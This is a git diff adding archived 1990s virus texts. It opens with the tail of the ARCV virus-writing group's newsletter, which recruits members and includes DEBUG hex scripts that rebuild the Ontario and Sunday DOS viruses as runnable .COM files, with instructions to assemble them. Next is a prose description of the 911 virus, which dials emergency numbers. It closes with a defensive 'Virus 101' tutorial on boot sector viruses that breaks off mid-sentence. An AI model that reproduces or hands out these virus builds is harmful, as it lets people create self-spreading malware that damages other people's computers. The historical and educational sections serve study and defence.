Machine Configuration data sheet please return to Apache +Warrior. Through E-Mail on any Flashback BBS or the BBS where you got this +from. + +--------------------------------------------------------------------------- +The ARCV'92 +Octarine - The Pigment of Imagination...... +---------------------------------------------------------------------------ARCV NEWS 003. + + The Association of Really Cruel Viruses. + + + This is one of the first English Computer Underground groups, although +we are an English organisation we can only be contacted through American or +Eastern Europe Virus boards. Or we will contact through a Fidonet address. + + What is The ARCV. + + ARCV is a organisation that is involved in Writing and Research of +computer viruses. We hold a Library of IBM Computer viruses for the use of +the ARCV members. But as a group we are involved in viruses for most the +main computer types (IBM PC, AMIGA, ST, MAC). We have a Bi-Monthly +newsletter with the latest virus news from around the country and from +around the world, virus Dis-Assemblies and other virus Debug Scripts. We +have links with PHALCON/SKISM in the US, we also have links with some +Eastern Europe Virus writers. Are group is not only limited to virus +activities but other 'Underground' activities also (Hacking, Phreaking +etc.) so any new members who don't write viruses could be involved in any +of the other activities we are involved in. + + Are members come from the youths of today, at the moment we are mainly +English students that wish to beat and know more about the system. We come +from a range of backgrounds from the Electronics side and the Computer +side, I myself Apache Warrior come mainly from the Electronics side but +branched to the Computer side fully around 2 years ago. I Hack, Phreak and +write Viruses, I am the President of the group (after all I started the +group) and I am some what of an expert on beating the BT phone exchange and +being a BBS A HOLIC that comes in very handy. Now ICE-9 is also a +Electronics guy who turned to the computer he writes viruses and is into +Heavy Metal. Now the picture put out by the Anti-Virus Authors is that +Virus writers are Sad individuals who wear Anoraks and go Train Spotting +but well they are sadly mistaken, we are very intelligent, sound minded, +highly trained, and we wouldn't be seen in an Anorak or near an Anorak even +if dead. + + We aim to provide the ARCV members and some Non-Members an insight to +the computer underground world and would you believe it is huge. The Group +is always seeking new members and we require new members to stay afloat, +soon we will be opening the world HQ in the UK this will have special +access areas for the ARCV members these will include access to the ARCV +Virus Library, all of which are legit viruses and No Trojans.ARCV NEWS 004. + + The Ontario Virus + + Well heres a virus from Canada. + + V Status: Rare + Discovered: July, 1990 + Symptoms: .COM & .EXE growth; decrease in system and free memory; + hard disk errors in the case of extreme infections + Origin: Ontario, Canada + Eff Length: 512 Bytes + Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector + Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV + Removal Instructions: SCAN /D, or Delete infected files + General Comments: + The Ontario Virus was isolated by Mike Shields in Ontario, Canada in + July, 1990. The Ontario virus is a memory resident infector of .COM, + .EXE, and overlay files. It will infect COMMAND.COM. + + The first time a program infected with the Ontario Virus is executed, + it will install itself memory resident above the top of system memory + but below the 640K DOS boundary. Total system memory and free memory + will be decreased by 2,048 bytes. At this time, the virus will infect + COMMAND.COM on the C: drive, increasing its length by 512 bytes. + + Each time an uninfected program is executed on the system with the + virus memory resident, the program will become infected with the viral + code located at the end of the file. For .COM files, they will + increase by 512 bytes in all cases. For .EXE and overlay files, the + file length increase will be 512 - 1023 bytes. The difference in + length for .EXE and overlay files is because the virus will fill out + the unused space at the end of the last sector of the uninfected file + with random data (usually a portion of the directory) and then append + itself to the end of the file at the next sector. Systems using a + sector size of more than 512 bytes may notice larger file increases + for infected files. Infected files will always have a file length + that is a multiple of the sector size on the disk. + + In the case of extreme infections of the Ontario Virus, hard disk + errors may be noticed. + + Ontario uses a complex encryption routine, and a simple identification + string will not identify this virus. + +--------------------------------------------------------------------------- +n ontario.com +e 0100 E9 1D 00 1D 66 65 63 74 65 64 20 50 72 6F 67 72 +e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20 +e 0120 90 E8 E9 01 93 84 7B D9 F8 69 7C 3C 84 7B B6 A5 +e 0130 71 60 0F CB 65 B7 BB 0A A3 07 55 97 7F 86 BE 9A +e 0140 FF 84 55 0D E5 84 79 AA F7 1A 79 86 F7 47 30 0A +e 0150 A0 05 55 87 7B 04 7B 25 69 84 56 04 7B 27 69 84 +e 0160 F5 44 75 9B F0 71 48 7B C2 80 79 78 88 20 F5 5D +e 0170 81 43 7D 00 7B FB 7B 27 FD 84 80 3C 84 CF B6 A5 +e 0180 64 9A 7C 8F 96 F0 77 09 CD FF 7B 3B 7B 85 2C 78 +e 0190 DE 21 B8 08 BB AA 7A 82 06 84 91 6F 6E CD 15 B9 +e 01A0 84 7B 0E 86 3B 4B FB 78 30 F1 6F B8 78 F0 6B B8 +e 01B0 84 F1 72 8A 64 3E A6 85 93 8D 7B 4B 93 81 7B AA +e 01C0 84 AA 7B 86 7D 9A 29 D5 28 D4 C3 84 38 6C 5D 85 +e 01D0 09 9C 8D 45 7A F0 70 04 9A 7A C3 85 38 6C 6D 85 +e 01E0 09 8C C3 86 46 6C 75 85 08 87 92 86 7A 0F A3 8A +e 01F0 64 3C 7B D3 93 7B 7B 0D 75 80 79 0D 6D 82 79 3E +e 0200 73 86 C2 9F 7B 30 44 6C 97 84 09 CC FA BA 73 86 +e 0210 36 DE 0F BD DB 8D 79 BE 7D 8F 79 F0 4C B7 A9 B7 +e 0220 B2 3C 79 C6 93 4B 7B F6 50 B9 7B 64 0C A2 2B 25 +e 0230 73 86 D8 FF 7B 25 71 86 D8 F9 7B DC 56 87 7B 42 +e 0240 7D 8C 79 6D D8 8D 79 26 70 86 90 CD EB 07 45 98 +e 0250 79 85 0E 87 92 01 7B 25 77 86 C2 84 79 73 9A D4 +e 0260 29 35 7F 57 B1 57 93 87 B9 AF 7D 94 79 D4 DA 98 +e 0270 79 27 00 84 DA 9A 79 81 6B 84 D8 F9 7B DC D8 9A +e 0280 79 43 7D 98 79 85 7B 7B 7D 88 79 DD 21 3C 7B C6 +e 0290 93 E7 7B F6 3C 04 4D 7C 7A 8C 48 44 F5 5C DB E8 +e 02A0 7F 8A 64 8A 7C 26 97 85 48 72 C4 A0 79 D3 C2 84 +e 02B0 79 78 88 20 C5 AC 79 6C 21 84 21 3D 7B 86 CF C4 +e 02C0 93 B7 7B F6 6C B7 B2 B7 A9 3C 7B C6 93 A3 7B F6 +e 02D0 70 3E 73 86 C2 9F 7B 30 3B 6C 61 84 F0 92 7D 86 +e 02E0 F0 8A 7F 86 C3 85 2C 6C 77 84 CF BA 93 83 7B DC +e 02F0 20 DD 21 9B 7C 47 E7 AA 84 9A 7B 86 B8 C7 41 D8 +e 0300 38 CB 36 C9 3A CA 3F AA 38 CB 36 84 84 5E 56 2E +e 0310 8A 84 E8 01 B9 E8 01 F6 D0 2E 30 04 46 E2 F8 C3 + +rcx +220 +w +q + +--------------------------------------------------------------------------- +Apche.. +ARCV NEWS 005. + + The Sunday Virus + + According to Patty Hoffman, the Sunday virus is based on the Jerusalem +viruses, because the codes for both viruses are similar. Sunday infects +COM, EXE, and OVL files, when they are executed, and it stays resident in +memory. It was circulated around the Seattle, Washington area in 1989, and +is very common. + + How ever this version of Sunday doesn't seem to print any messages on +the screen, like some of the other versions do, every Sunday. This virus +spreads rapidly, and is a great replicator. + + To create SUNDAY.COM, cut out the following code, and name the +resulting file sunday.scr. Then, use this command: DEBUG < SUNDAY.SCR +this will then produce the .COM all ready for use. + +--------------------------------------------------------------------------- +n sunday.com +e 0100 E9 92 00 59 57 C8 F7 E1 EE E7 00 01 4C 1E 00 00 +e 0110 00 02 00 AB 00 0C 13 16 17 C7 02 BF 05 3A 1E 63 +e 0120 79 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06 +e 0130 5F BD 1D 80 00 00 00 80 00 BD 1D 5C 00 BD 1D 6C +e 0140 00 BD 1D 00 0A 95 22 29 00 00 00 00 F0 02 00 4D +e 0150 5A 87 01 14 01 ED 05 80 01 23 0B FF FF 8C 20 C0 +e 0160 06 89 19 C6 00 8C 20 1E 00 00 00 00 00 00 00 00 +e 0170 05 00 20 00 29 15 01 79 00 02 10 00 C0 20 02 00 +e 0180 54 61 28 99 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 01 +e 0190 00 00 00 00 00 FC 06 B8 00 00 8E C0 26 A1 84 00 +e 01A0 07 3D 4C 02 75 10 B4 DD BF 00 01 BE C2 06 03 F7 +e 01B0 2E 8B 4D 11 CD 21 8C C8 05 10 00 8E D0 BC C0 06 +e 01C0 50 B8 C6 00 50 CB FC 06 2E 8C 06 31 00 2E 8C 06 +e 01D0 39 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 +e 01E0 00 2E 01 06 49 00 2E 01 06 45 00 B4 FF CD 21 80 +e 01F0 FC 04 75 10 07 2E 8E 16 45 00 2E 8B 26 43 00 2E +e 0200 FF 2E 47 00 33 C0 8E C0 BB FC 03 26 8B 07 2E A3 +e 0210 4B 00 26 8A 47 02 2E A2 4D 00 26 C7 07 F3 A5 26 +e 0220 C6 47 02 CB 58 05 10 00 8E C0 0E 1F B9 C2 06 D1 +e 0230 E9 33 F6 8B FE 06 B8 3E 01 50 FF 2E 59 06 8C C8 +e 0240 8E D0 BC C0 06 33 C0 8E D8 2E A1 4B 00 89 07 2E +e 0250 A0 4D 00 88 47 02 8B DC B1 04 D3 EB 83 C3 20 83 +e 0260 E3 F0 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00 CD 21 +e 0270 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19 00 0E +e 0280 1F BA 4C 02 B8 21 25 CD 21 8E 06 31 00 26 8E 06 +e 0290 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05 E0 F9 +e 02A0 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35 00 1E +e 02B0 06 50 53 51 52 B4 0F CD 10 3C 07 74 07 2E C7 06 +e 02C0 4A 02 00 B8 B8 08 35 CD 21 2E 89 1E 13 00 2E 8C +e 02D0 06 15 00 0E 1F C7 06 1F 00 E0 79 B8 08 25 BA 0A +e 02E0 02 CD 21 5A 59 5B 58 07 1F 9C 2E FF 1E 17 00 1E +e 02F0 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA C2 06 B1 04 +e 0300 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83 3E 1F 00 00 +e 0310 75 22 1E 06 56 57 50 8D 36 3E 02 0E 1F A1 4A 02 +e 0320 8E C0 BF 00 00 FC A5 A5 A5 A5 A5 A5 58 5F 5E 07 +e 0330 1F EB 06 90 2E FF 0E 1F 00 2E FF 2E 13 00 48 F0 +e 0340 61 F0 21 F0 48 F0 61 F0 21 F0 00 B8 9C 80 FC FF +e 0350 75 05 B8 00 04 9D CF 80 FC DD 74 0E 3D 00 4B 75 +e 0360 03 EB 21 90 9D 2E FF 2E 17 00 58 58 B8 00 01 2E +e 0370 A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E A1 0F 00 2E +e 0380 FF 2E 0A 00 2E C7 06 70 00 FF FF 2E C7 06 8F 00 +e 0390 00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52 +e 03A0 56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A +e 03B0 15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 0F 03 +e 03C0 F7 E3 F7 E1 0B D2 75 05 3D C2 06 72 F0 2E 8B 16 +e 03D0 80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00 +e 03E0 8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C +e 03F0 20 46 EB EC 2E 89 36 57 06 B9 0B 00 2B F1 BF 84 +e 0400 00 0E 07 B9 0B 00 F3 A6 75 03 E9 C2 02 2E C6 06 +e 0410 56 06 00 90 2E 8B 36 57 06 8D 3E 55 06 4F 4E 26 +e 0420 8A 05 34 BB 3C 00 74 0D 3A 04 74 F1 2E C6 06 56 +e 0430 06 01 90 EB E8 2E 80 3E 56 06 00 74 16 4F 26 80 +e 0440 3D FF 74 2B 47 2E 8B 36 57 06 2E C6 06 56 06 00 +e 0450 90 EB CA 07 1F 5F 5E 5A 59 5B 58 33 C9 B8 01 43 +e 0460 CD 21 B4 41 CD 21 B8 00 4B 9D 2E FF 2E 17 00 B8 +e 0470 00 43 CD 21 72 05 2E 89 0E 72 00 72 25 32 C0 2E +e 0480 A2 4E 00 1E 07 8B FA B9 41 00 F2 AE 80 7D FE 4D +e 0490 74 0B 80 7D FE 6D 74 05 2E FE 06 4E 00 B8 00 3D +e 04A0 CD 21 72 7C 2E A3 70 00 8B D8 B8 02 42 B9 FF FF +e 04B0 BA FB FF CD 21 72 EB 05 05 00 2E A3 11 00 B9 05 +e 04C0 00 BA 6B 00 8C C8 8E D8 8E C0 B4 3F CD 21 8B FA +e 04D0 BE 05 00 F3 A6 74 22 B0 00 B9 00 00 BA 00 00 B4 +e 04E0 42 CD 21 8D 16 DD 05 B9 14 00 B4 3F CD 21 81 3E +e 04F0 EF 05 89 19 75 0A E9 91 01 B4 3E CD 21 E9 CF 01 +e 0500 B8 24 35 CD 21 89 1E 1B 00 8C 06 1D 00 BA 07 02 +e 0510 B8 24 25 CD 21 C5 16 80 00 33 C9 B8 01 43 CD 21 +e 0520 72 3B 2E 8B 1E 70 00 B4 3E CD 21 2E C7 06 70 00 +e 0530 FF FF B8 02 3D CD 21 72 24 2E A3 70 00 8C C8 8E +e 0540 D8 8E C0 8B 1E 70 00 B8 00 57 CD 21 89 16 74 00 +e 0550 89 0E 76 00 B8 00 42 33 C9 8B D1 CD 21 72 3E 80 +e 0560 3E 4E 00 00 74 04 EB 5B 90 90 BB 00 10 B4 48 CD +e 0570 21 73 0B B4 3E 8B 1E 70 00 CD 21 E9 51 01 FF 06 +e 0580 8F 00 8E C0 33 F6 8B FE B9 C2 06 F3 A4 8B D7 8B +e 0590 0E 11 00 8B 1E 70 00 06 1F B4 3F CD 21 72 1F 03 +e 05A0 F9 33 C9 8B D1 B8 00 42 CD 21 BE 05 00 B9 05 00 +e 05B0 1E 0E 1F F3 A4 1F 8B CF 33 D2 B4 40 CD 21 72 0D +e 05C0 E9 C7 00 B9 1C 00 BA 4F 00 B4 3F CD 21 72 4A C7 +e 05D0 06 61 00 89 19 A1 5D 00 A3 45 00 A1 5F 00 A3 43 +e 05E0 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00 A1 53 00 +e 05F0 83 3E 51 00 00 74 01 48 F7 26 78 00 03 06 51 00 +e 0600 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3 7C 00 89 +e 0610 16 7E 00 05 C7 06 83 D2 00 72 3A F7 36 78 00 0B +e 0620 D2 74 01 40 A3 53 00 89 16 51 00 A1 7C 00 8B 16 +e 0630 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00 C7 06 63 +e 0640 00 C6 00 A3 5D 00 C7 06 5F 00 C0 06 33 C9 8B D1 +e 0650 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00 B4 40 CD +e 0660 21 72 11 3B C1 75 23 8B 16 7C 00 8B 0E 7E 00 B8 +e 0670 00 42 CD 21 72 14 33 D2 B9 C2 06 B4 40 CD 21 B9 +e 0680 05 00 8D 16 05 00 B4 40 CD 21 2E 83 3E 8F 00 00 +e 0690 74 04 B4 49 CD 21 2E 83 3E 70 00 FF 74 31 2E 8B +e 06A0 1E 70 00 2E 8B 16 74 00 2E 8B 0E 76 00 B8 01 57 +e 06B0 CD 21 B4 3E CD 21 0E 1F C5 16 80 00 2E 8B 0E 72 +e 06C0 00 B8 01 43 CD 21 8D 16 1B 00 B8 24 25 CD 21 07 +e 06D0 1F 5F 5E 5A 59 5B 58 9D 2E FF 2E 17 00 CD 20 BA +e 06E0 00 11 01 ED 05 80 01 23 0B FF FF 95 22 00 0A D5 +e 06F0 44 00 00 00 00 00 00 00 00 00 00 FF BB F9 FA E8 +e 0700 F2 F8 FA 95 FE E3 FE BB F8 EE E9 FE 95 FE E3 FE +e 0710 BB F7 F4 EF EE E8 95 F8 F4 F6 BB F8 EC F2 95 FE +e 0720 E3 FE BB FE EF F9 FA E8 F2 F8 95 FE E3 FE BB F9 +e 0730 FA E8 F2 F8 FA 95 F8 F4 F6 BB 8A 89 88 95 FE E3 +e 0740 FE BB FF F9 FA E8 FE 95 FE E3 FE BB F9 FA E8 F2 +e 0750 F8 95 F8 F4 F6 BB 01 68 61 FC 03 00 00 00 00 00 +e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +e 0770 00 00 00 00 00 00 00 00 8C 0D 01 00 20 1C C3 28 +e 0780 8C 0D 01 00 FE 26 2E 00 8C 0D 04 7F A7 20 6C 15 +e 0790 24 25 05 00 20 00 C6 08 60 C1 57 18 08 25 AB 00 +e 07A0 44 7F 0A 02 C2 06 57 18 BD 1D 47 01 04 7F 7C 00 +e 07B0 C2 06 B6 00 1C 09 AF 1D 3D 1C 07 02 BD 1D 02 02 +e 07C0 4D 3A CD 20 C8 F7 E1 EE E7 1A 1A 1A 1A 1A 1A 1A + +rcx +7CF +w +q + +--------------------------------------------------------------------------- + + +ARCV NEWS 006. + + Closing. + + Well that it for this time the mag in future will be a Bi-Monthly +affair and I now offer out to you all to send in any articile for inclusion +in future issues. + + Well I'm not sure what will be in next month but we should have the +Asm source for Commander Bomber Virus and much more. \ No newline at end of file diff --git a/textfiles.com/virus/armag911.txt b/textfiles.com/virus/armag911.txt new file mode 100644 index 00000000..c74435cc --- /dev/null +++ b/textfiles.com/virus/armag911.txt @@ -0,0 +1,42 @@ +*************************************************************************** +* The 911 Virus * +* (An "Armagedon the Greek" Variant) * +*************************************************************************** +* Commentary and disassembly by Black Wolf * +*************************************************************************** + + The 911 virus is a direct variant of the "Armagedon the GREEK" +virus, derived merely by changing the text within and the dialing string. +The virus' size is 1079 bytes, making the smallest carrier 1081 bytes. The +main effect of the virus is to dial "911" every once in a while if a modem +is present on com ports 1-4 (the original virus dialed the speaking clock +in Greece). It is a memory resident .COM infector. + + When executed, the 911 virus checks for residency. If it is already +installed, it simply passes control to the host file, otherwise, it goes +memory resident, hooking Int 08h and Int 21h. When 911 goes resident, it +uses a rather strange way of doing it. It re-executes the program and uses +an Int 27 to go memory resident, but because of the second execution it does +not truly terminate and is still able to return control to the host. + + Once memory resident, the 911 virus infect .COM files on execution +(whenever an Int 21, function 4bh is called) after checking if the file has +already been infected. The identification string the virus uses to check for +infection is the string "Support Your Police" located near the end of the +virus (the original was "Armagedon the GREEK"). + + The infection process is also somewhat strange, as the virus +allocates all unused memory for itself, the loads the entire victim file into +memory in one call. It then "infects" it in memory, and writes it back to +the disk. Afterwards, it releases the memory. + + All of the dialing and timing is handled from the Int 08 (Timer +Click) handler. When activated, it will dial 911 (police/fire/emergency) +and wait for several seconds. It sends the commands to all ports 1-4, so +the results of hardware other than modems connected to these ports may be +unpredictable. + + The storage bytes are found at the very end of the file, with the +first byte encrypted by adding 0bh to its value. Infected files may be +repaired by restoring these bytes to the beginning, unencrypting the first +one, and cutting the virus off the end of the host program. diff --git a/textfiles.com/virus/atari101.txt b/textfiles.com/virus/atari101.txt new file mode 100644 index 00000000..b509bce8 --- /dev/null +++ b/textfiles.com/virus/atari101.txt @@ -0,0 +1,903 @@ +From: woodside@ttidca.TTI.COM (George Woodside) +Newsgroups: comp.sys.atari.st,comp.sys.apple,comp.sys.mac,comp.sys.ibm.pc +Subject: Virus 101 - Chapter 1 +Date: 1 Mar 89 14:39:58 GMT + +Preface: The program VKILLER is specific to the ATARI ST. My apologies +for not making this clear in the previous posting, which went to +several newsgroups. I have recieved far too many requests for the +program from users of other systems to reply to each one individually, +and the mailer has bounced some of the replies I tried to send. If you +have an Atari, VKILLER was posted here a few weeks ago, and is +available in the archives, on GEnie, Compuserve, and from most public +domain disk distributors and User Group libraries. The current version +is 2.01. + +Initial postings will cover virus fundamentals, as they apply to the +area of the Atari ST and, similarly, to MS-DOS systems. The file +systems of the two machines are nearly identical. These general +information articles will be cross-posted to the newsgroups in which +this topic is now active. Future postings will be made only to the +Atari newsgroup, since they will deal with viruses (the plural, +according to Webster's, is viruses) known to exist in the ST world. +They would automatically be different than an IBM virus, since they +are in the 68000 instruction set, or from a Mac or Amiga virus, since +the file systems differ. Since all the viruses I have located are the +"BOOT SECTOR" type (far and away the most common), that's what I will +dwell upon. If and when the proposed newsgroup comp.virus becomes +active, it will be added to the list for all postings. + +Your generic disclaimer: I just an old-school computer hacker, with 20 +years in the software business. I built my first IMSAI many years ago, +and have had several different computers. That qualifies me to have +spent a lot of time on computers, but nothing further. I may be wrong +about some things, may have a different opinion than you or anybody +else, or most anything else you'd care to have disclaimed. What I +think is my own opinion, and in no way represents the opinion or +position of my employer or anyone else. I've written several articles +for magazines as well as software related to virus detection and +killing, but I have been known to be wrong (so they tell me :^)). + +While posting any kind of information about viruses may trigger +someone to attempt creating one, I believe that the benefit of the +knowledge to potential victims outweighs that risk. I don't believe +that you can stop someone (who wishes to) from creating a virus by +withholding information - it is already available from many sources. +Since not all viruses act the same, or attempt to attack in the same +manner, it may help potential (or current) victims to learn about the +symptoms of the viruses known to exist, and how to protect themselves. + +While the concept of viruses can be complex, I'll try to keep things +at a level that should be understandable by most anyone past the +casual user genre. However, since I've been at this sort of thing for +some time, what I consider basic knowledge may not be familiar to +everyone. Advance apologies are offered here for any invalid +assumptions, typos, smart alec remarks, grammatic errors, or whatever +offends you. + +Some basic terms, as they have come to be used in this area: + +A VIRUS is any program which spreads itself secretly. It may be +destructive, a prank, or even intended to be helpful, but it spreads. + +A TROJAN HORSE is a program which executes one function secretly while +appearing to be accomplishing some other task, or appearing to be some +other program entirely. One task a Trojan Horse may accomplish is to +install a virus, which would then spread itself. + +A WORM is a program or function which imbeds itself inside another +program, be it an application, part of a system, a library or +whatever. It may or may not spread itself by some means, and may or +may not have destructive intents. + +Now, to the basics of a disk (specifically floppies, but true of most +hard disks as well): + +A DIRECTORY is a list of files and sub-directories. There is one +primary directory (called the root directory) on a disk. It contains +the entries for files, and other directories (called sub-directories, +or folders on the Atari). Sub-directories (folders) may contain +entries of other sub-directories, files, or both. Every file has one +entry in the disk directory (or in some sub-directory). That entry +contains, among other things, the file name, date and time of +creation, length, and the address of the first entry in the File +Allocation Table (FAT) for the file. + +A FAT is a File Allocation Table. It is a road map of how the +operating system will locate data on a disk. Essentially, it is a +series of pointers. The directory entry of a file points to the first +FAT entry of that file. That entry points to the next, and so on, +until the last entry, which contains a special value indicating end of +file. There are two copies of the FAT on the disk, since it is +absolutely critical. Lose the FAT, and the data on the disk becomes +un-accessable. + +A BOOT SECTOR is the first sector on a floppy disk. With the Atari +(and MS-DOS) system, it contains configuration information about the +disk. That information includes how many tracks are on the disk, how +many sectors per track, how many sides on the disk, how big the FATs +and directories are, where the data begins, etc. On the MS-DOS +systems, the boot sector contains the ID of the operating system under +which it was formatted. On the Atari, that value is not used, but +replaced (in part) by a number. That number should be different on +every disk, and is used as part of the mechanism by which disk changes +are detected. The boot sector may or may not contain executable code. +If it does contain executable code, it is normally executed only at system +powerup or system reset time. + +On all such disks, the boot sector is number 0, the first sector on the +first side of the first track. On a standard format Atari disk, the +next five sectors are the first copy of the FAT, the next five sectors +are the second copy of the FAT, the next seven sectors are the root +directory, and the remainder of the disk is available for data. + +Now, on with the show: + +Floppy disks are changed on a regular basis while the computer is +being used. More so on systems with no hard disks, but periodically on +most all systems. This event, referred to as a "Media Change", is +detected by the computer's disk drive. The disk door is opened, the +status of the write protection changes as one disk is removed and +another is inserted, etc. When that happens, the operating system must +recognize that the disk has been changed before attempting to read or +write to the new disk. The operating system reads the disk's boot +sector to learn about the newly inserted disk. That instant, when the +operating system checks the new disk, is when nearly all the boot +sector viruses spread. We'll get to that in the next chapter, but first, +a more primary question: + +How did the virus get in there? + +When a computer is booted up from a power off state, or reset (in most +cases), it starts executing code from internal ROMs. Those ROMs set up +primary vectors, minimal configuration information, and perform some +fundamental tests. Then they start moving into uncharted waters. They +have to find out what devices are attached, and get them into +operating status. They also have to provide a means of expanding their +own capabilities to support new devices, functions, and whatever else +which may not have existed when the ROMs were created. One of the +means by which this is accomplished is by checking various addresses +for special codes, magic numbers, or any kind of response to a read +or write. Another function which may be enabled is checking the boot +sector on an inserted floppy disk for executable status. If that boot +sector has executable status, the code contained in the boot sector is +executed. That code may cause other portions of the disk to be loaded +and executed, set variables or vectors, or nearly anything imaginable. +That includes infecting the system with a virus, if that's what the +boot sector code contains. Executable status may be via a special flag +value in a reserved address, but it is normally determined by adding +up the value of all the data bytes in the boot sector. If the total +derived (called a checksum) is a specific value (a "magic" number), +then the boot sector is deemed executable. The code is usually executed +at that time. The code is not normally garanteed to be loaded at any +specific address in memory, so it must be "position independant", +or capable of executing no matter where it exists in memory. + +The boot sector is of limited size, normally 512 bytes. While that is +enough for a small program, it may not be enough for whatever task it +is designed to accomplish. So, part of what the code in the boot sector +accomplishes must be to load the rest of the code it needs to get the job done. +This may be a normal data file, or hard coded to some other part of the +disk. + +If the code from the boot sector is designed only to accomplish some task, +it will normally take the steps to do so, then return to the operating +system. This may be setting the screen resolution or colors, issuing +an initialization command to some device, or setting up some option +or feature. If the code is designed to remain available after the initial +execution (such as part of a device driver), it must inform the operating +system that it wishes to remain resident. The operating system then +alters the amount of RAM available to protect the space occupied by the +loaded code, so that subsequent programs do not tamper with the loaded +routine. Such a routine is referred to as a "Terminate and Stay Resident" +routine, or a TSR. Viruses must be TSR type programs. They have to remain +in the system, and active, to be able to accomplish their spread, and +eventually, their true goal. If the boot sector program was designed +to attack immediately, it may accomplish its destruction, but it would +never get the opportunity to spread, and the disk which caused the +attack would be easily identifiable. + +Most viruses accomplish system infection by taking over a "vector". A +vector is a specific address in system memory which contains the +address of a routine or function. When an interrupt (such as pressing +a key, the clock ticking, or so on) occurs, processing is suspended, +and the system loads the address in some vector associated with that +event. It executes the routine at the address which was stored in the +vector, then resumes whatever it was up to when the interrupt +occurred. Other vectors are not associated with interrupts, but with +specific functions, such as display a character on the screen, read a +sector from the disk, write to the printer, and so on. + +To take over a vector, the steps are fairly simple. A RAMdisk, for +example, will usually take over a disk read/write vector. When it +installs itself, it removes the current address from the vector +assigned to the disk read/write function. It saves that address in +it's own code, and places the address of it's own code in the vector. +When a disk read/write call is made by the operating system, the +operating system loads the address found in the proper vector, and +starts executing the code found at that address. That address now +points to the executable code of the RAMdisk. The first thing the +RAMdisk does is check the function call's parameters to see if the +read/write is for the RAMdisk. If it is, the RAMdisk accomplishes the +read or write, and returns to the operating system. If the read/write +is for some other disk drive, the RAMdisk code passes the call on to +the address it removed from the vector, allowing the assigned device +to accomplish the task. + +There may be more than one alteratiion of the vector. Each new routine +which is installed will save the old vector, and insert itself. That +means that the routine installed last will get the first access to any +call which uses that vector. If it does not want the call, it passes +the call on to the address it found in the vector, and so on. The +significance of this sequencing is that a boot sector virus, if +present, will be one of the first "vector snatchers" to get installed. +Conversely, it will be one of the last routines in the sequence to get +executed when a vector is accessed. + +If the vector in question happens to be for floppy disk I/O, the virus +will be one of the last vectors before the real physical read/write +routine. So, if a program designed to detect a virus's floppy disk I/O +calls is executed as part of a startup procedure, it can easily be +fooled. The detect program will see only normal system I/O calls +passing through the vector. The virus resides in the vector list after +the anti-virus program, so the anti-virus will never see any activity +generated by the virus. The anti-virus thinks that things are +progressing well, while, in reality, the virus is either spreading or +doing damage behind the anti-virus's back. + +If the anti-virus gets installed first (say, by being in a boot sector +itself), it has a better chance of offering protection, but not an +absolute one. Some viruses check things like ROM version numbers, and +know the absolute addresses in the ROMs of the functions they want. By +using those addresses, they can bypass subsequent links in the vector +list, and still do their dirty work. They can also refuse to install +themselves if the addresses or version numbers do not correspond to +the environment they want. + +End of Chapter 1. +-- +*George R. Woodside - Citicorp/TTI - Santa Monica, CA +*Path: ..!{philabs|csun|psivax}!ttidca!woodside +From: woodside@ttidca.TTI.COM (George Woodside) +Newsgroups: comp.sys.atari.st,comp.sys.apple,comp.sys.mac,comp.sys.ibm.pc +Subject: Virus 101 - Chapter 2 +Date: 6 Mar 89 14:00:21 GMT + +In response to a lot of the mail I've received: +1) You haven't missed the "rest of the chapters". I'm posting them as I + get them written. + +2) You may not agree with me. I tried to set down the definitions and + terms as I would be using them, for the benefit of those who weren't + familiar with them. This whole area is rather vague, and most of us + in the trenches and making up the rules, as we learn the game. + +When we left our virus at the end of Chapter 1, it had managed to get +itself installed in our system by being present on the boot sector of a +disk in the machine at cold start or reset. + +Another way a virus may be installed is via a trojan horse program. Trojan +horses come in many flavors. Some disguise themselves as programs which +provide some useful function or service, while secretly doing something +else. The something else may be installing a virus, sabotaging some part of +a disk, setting up hooks to steal passwords on time sharing systems, or +whatever else you can imagine. In the event of the virus installer, the +trojan horse has a bit more flexibility than a typical boot sector virus, +simply because it doesn't have to fit itself into a relatively small space. +Since it is hiding in a larger program, it can be whatever size is +necessary to accomplish the task. + +A typical boot sector contains information about the layout of the disk it +resides upon. This block of data requires 26 bytes. The first three bytes +of the boot sector are left available for an assembly language "jump" +command, to allow the execution of the code to skip over the boot sector's +data block. And, the boot sector must add up to the proper magic number to +have executable status. That will require another two bytes, since the +checksum is a 16 bit value. So, 31 bytes are allocated. Since (at least in +the 68000 family) machine instructions are always 16 bits and must begin on +an even address, 32 of the 512 bytes in the boot sector are not available +to any executable program. So, there are 480 bytes available for the +executable code. Machine instructions vary in length, depending upon what +they do, and how much additional information is required. In the 68000, +instruction lengths vary from one to five words, but a reasonable average +instruction length for a program is just over two words. That translates +the 480 bytes to 120 instructions. + +The virus must contain the code to install itself, reserve the memory it +occupies to keep subsequent programs from over-writing it, spread itself to +other disks, and whatever it really intends to do once it decides it is +time to act. That's quite a bit of code to fit into 120 instructions, +unless it extends itself by loading some other part of the disk, or a file. + +Files are pretty much out of the question. Most computer users would notice +if some file they didn't recognize started popping up on a lot of their +disks. There are attributes settable in a disk directory which can be used +to tell the operating system that certain files are "Hidden" or "System" +files. If the file had the proper status bits set, it could prevent itself +from appearing in normal disk directory displays. There are, however, more +flexible disk directory listing programs which will display the entries for +these files, as well as 